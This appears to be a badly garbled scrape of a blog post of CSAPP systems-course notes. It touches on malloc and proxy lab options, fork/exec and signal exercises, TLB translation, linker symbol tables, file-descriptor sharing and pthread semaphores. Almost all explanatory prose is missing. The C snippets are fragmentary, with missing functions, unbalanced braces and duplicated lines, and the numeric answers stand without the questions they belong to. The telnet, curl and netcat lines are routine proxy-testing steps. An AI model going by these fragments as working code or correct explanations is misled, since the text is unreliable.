free block first fit/next fit, blocks sorted by address with first fit, best fit
mdriver.c 12
-p
-t <tracedir>
-f <tracefile>
-c <tracefile> 1
-h
-l malloc
-V
-v <verbose level>
-d <i> 0,1,2
-D -d2
-s <s> s
23 2 64
8 4
mm-textbook.c 4
mm-naive.c
mm-textbook.c
heap checker
heap checker
mm-textbook.c
100 90
malloc
<type_a>* <type_b>*
int 4 char
1 32 64
void *
val1 val2
Malloc
free
sbrk
payload
Bi-directional
Immediate vs. Deferred
m1 m2 8 bytes 5 bytes
block
block
block free
malloc/free
free size
block
block
block free allocated
# CSAPP # # # Malloc
tomcat tomcat
-
-
-
-
-
-
-
-
-
I Data Lab -
II Bomb Lab - gdb
2. Concurrent Proxy:
3. Cache Web Objects: LRU
$ ./port-for-user.pl dawang
+1
$ ./proxy 12345
HTTP
www.cmu.edu
/hub/index.html
HTTP \r\n \r\n
header
Firefox/10.0.3
open_clientfd open_listenfd
T MAX_CACHE_SIZE + T * MAX_OBJECT_SIZE
man telnet
telnet www.wdxtub.com
cURL: HTTP
curl http://www.wdxtub.com
netcat : telnet
nc catshark.ics.cs.cmu.edu 12345
HTTP
URL
ASCII
HTTP/1.0
SIGPIPE
Header
Cache
mutex
socket SIGPIPE
detach join
body socket
ubuntu
/ CSAPP
# CSAPP # # # Proxy
Hexo | - NexT.Mist
& | 0
! " # ☼ % & '
CSAPP
( 2016-05-01 | ) 2017-08-03 | * Technique | + | ,
- 3,889 | . 16
(Exited)
malloc malloc
exec
exec 0 1
ELF .data
IO fork
IO fork
1
fork , exec , wait printf printf stdout
(flushed)
int global_x = 0;
// fork
if (!fork()) {
//
global_x++;
printf("Child: %d\n", global_x);
}
else
{
//
wait(NULL);
global_x--;
printf("Parent: %d\n", global_x);
}
return 0;
}
1 18 1 16
Child: 18
Parent: 16
wait
wait
wait
18 16.
int global_x = 0;
// fork
if (!fork())
{
global_x++;
// exec
execl("./my_child", "./my_child", NULL);
printf("Child finished\n");
}
else
{
wait(NULL);
global_x--;
printf("Parent: %d\n", global_x);
}
return 0;
}
// my_child
int global_x;
return 0;
return 0;
}
Child: 0 18
pid_t pid;
int counter = 2;
int main()
{
signal(SIGUSR1, handler1);
printf("%d", counter);
fflush(stdout);
if ((pid = fork()) == 0)
{
while (1) {};
}
kill(pid, SIGUSR1);
waitpid(-1, NULL, 0);
counter = counter + 1;
printf("%d", counter);
exit(0);
}
void *pointers[N];
int i;
8 first-fit sbrk 8
block
sbrk
8 header 8
header
(8 + 56) × 32 = 2048
header
(8 + 8) × 32 = 512
sbrk
sbrk 64
sbrk
header
(8 + 56) × 32 = 2048
header
sbrk
2-level
Page directory
32 32 4 4K 4K/4 = 1K = 1024
Page table
32 32 4 4K 4K/4 = 1K = 1024
1024
32 4KB 12 20 10
1-level
32 4KB 12 20
Page table
4B 1,048,576 4MB(4,194,304B)
4B 1,048,576 4MB(4,194,304B)
2-level 2-
level
+---------------------------+ 0xFFFFFFFF
| 9MB Stack |
+---------------------------+
| ... Unused |
+---------------------------+
| 6MB Heap |
+---------------------------+
| 4MB Unused |
+---------------------------+
| 12MB Text and Data |
+---------------------------+
| 16MB Kernel Memory |
+---------------------------+ 0x00000000
----------------------
| 0 | kernel memory |
|--------------------|
| 1 | kernel memory |
|--------------------|
| 2 | kernel memory |
|--------------------|
| 3 | kernel memory |
|--------------------|
| 4 | text and data |
|--------------------|
| 5 | text and data |
|--------------------|
| 6 | text and data |
|--------------------|
|--------------------|
| 7 | unallocated |
|--------------------|
| 8 | heap |
|--------------------|
| 9 | heap |
|--------------------|
| 10 | unallocated |
|--------------------|
| 11 | unallocated |
|--------------------|
| 12 | unallocated |
|--------------------|
|....| unallocated |
|--------------------|
|n-12| unallocated |
|--------------------|
|n-11| unallocated |
|--------------------|
|n-10| unallocated |
|--------------------|
| n-9| unallocated |
|--------------------|
| n-8| unallocated |
|--------------------|
| n-7| unallocated |
|--------------------|
| n-6| unallocated |
|--------------------|
| n-5| unallocated |
|--------------------|
| n-4| unallocated |
|--------------------|
| n-3| stack |
|--------------------|
| n-2| stack |
|--------------------|
| n-1| stack |
----------------------
TLB
2. TLB 8
3. 2 8
4. 2 16
TLB
0x7E85 ?
0xD301 ?
? 0x3020
0xD040 ?
? 0x5830
TLB TLB Valid
0
0x7E85
# 16
0x7E85
# 2
0111 1110 1000 0101
# 2^8 8 VPN VPO
# VPO PPO
# TLB 4 set 2
#
01 1111 10 1000 0101
0x3020 8
0x4C20
0x7E85 0x9585
0xD301 —
0x4C20 0x3020
0xD040 —
— 0x5830
// main.c
int x = 5;
int y;
int y;
static int z = 3;
int main()
{
printf("%x\n", z());
x = 0xdeadbeef;
printf("%x\n", z());
}
// foo.c
short x;
int y = 0x12345678;
int z()
{
return y;
}
---------------------------------------------------------------
| File | Symbol | Strength/scope | Value | ELF section |
|-------------------------------------------------------------|
| | x | strong global | 5 | .data |
| |----------------------------------------------------|
| | y | weak global | - | .data |
| main.o |----------------------------------------------------|
| | z | local | 3 | .data |
| |----------------------------------------------------|
| | main | strong global | - | .text |
|-------------------------------------------------------------|
| | x | weak global | - | .data |
| |----------------------------------------------------|
| foo.o | y | strong global | 0x12345678 | .data |
| |----------------------------------------------------|
| | z | strong global | - | .text |
---------------------------------------------------------------
2
// main.c
#include <stdio.h>
static int a = 1;
int b = 2;
int c;
int main()
{
int c = 3;
foo();
printf("a=%d, b=%d, c=%d\n", a, b, c);
return 0;
}
// foo.c
int a, b, c;
void foo()
{
a = 4;
b = 5;
c = 6;
}
a static 1 b main
strong foo b main b b 5 c 3.
ABCDEFG
//
void read_and_print_one(int fd)
{
char c;
read(fd, &c, 1);
printf("%c", c);
fflush(stdout);
fflush(stdout);
}
if (!fork()) // fork fd
{
read_and_print_one(fd2); // fd2 B
read_and_print_one(fd2); // fd2 C
close(fd2); // fd2
fd2 = dup(fd1); // fd2 fd1
read_and_print_one(fd2); // fd1/2 B
}
else
{
wait(NULL);
read_and_print_one(fd1); // fd1/2 C
read_and_print_one(fd2); // fd1/2 D
printf("\n");
}
close(fd1);
close(fd2);
return 0;
}
AABCBCD foo.txt
id
myid (race)
//
void *foo(void *vargp)
{
int myid;
int main()
{
pthread_t tid[2];
int i, *ptr;
//
void *foo(void *vargp)
{
int myid;
myid = *((int *)vargp);
printf("Thread %d\n", myid);
}
int main()
{
pthread_t tid[2];
int i;
myid
//
void *foo(void *vargp)
{
int myid;
myid = (int)vargp;
printf("Thread %d\n", myid);
}
int main()
{
pthread_t tid[2];
int i;
//
sem_t s; // Semaphore s
int main()
{
pthread_t tid[2];
int i;
sem_init(&s, 0, 1); // 1
Pthread_join(tid[0], 0);
Pthread_join(tid[0], 0);
Pthread_join(tid[1], 0);
}
//
sem_t s; // Semaphore s
int main()
{
pthread_t tid[2];
int i;
sem_init(&s, 0, 0); // 0
1 2
Hexo | - NexT.Mist
& | 0